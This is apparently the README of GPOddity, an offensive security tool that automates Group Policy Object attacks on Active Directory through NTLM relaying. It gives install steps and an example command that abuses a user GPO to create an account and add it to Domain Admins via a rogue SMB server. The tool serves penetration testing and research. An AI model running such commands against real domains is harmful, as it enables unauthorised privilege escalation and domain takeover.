GPOddity: automating GPO attack vectors through NTLM relaying
The GPOddity project aims at automating GPO attack vectors through NTLM relaying (and more).
For more details regarding the attack and a demonstration of how to use the tool, see the associated article available here.
You can install GPOddity through pipx with the following command:
Alternatively, you can install GPOddity manually by cloning the repository and installing the dependencies:
$ python3 -m pip install -r requirements.txt
Below are some example commands taken from the article linked above.
Exploiting a Computer GPO to add a local administrator (running the embedded SMB server).
Exploiting a User GPO to add a domain administrator (no embedded SMB server).
python3 gpoddity.py –gpo-id ‘7B36419B-B566-46FA-A7B7-58CA9030A604’ –gpo-type ‘user’ –no-smb-server –domain ‘corp.com’ –username ‘GPODDITY$’ –password ‘[…]’ –command ‘net user user_gpo Password123! /add /domain && net group “Domain Admins” user_gpo /ADD /DOMAIN’ –rogue-smbserver-ip ‘192.168.58.102’ –rogue-smbserver-share ‘synacktiv’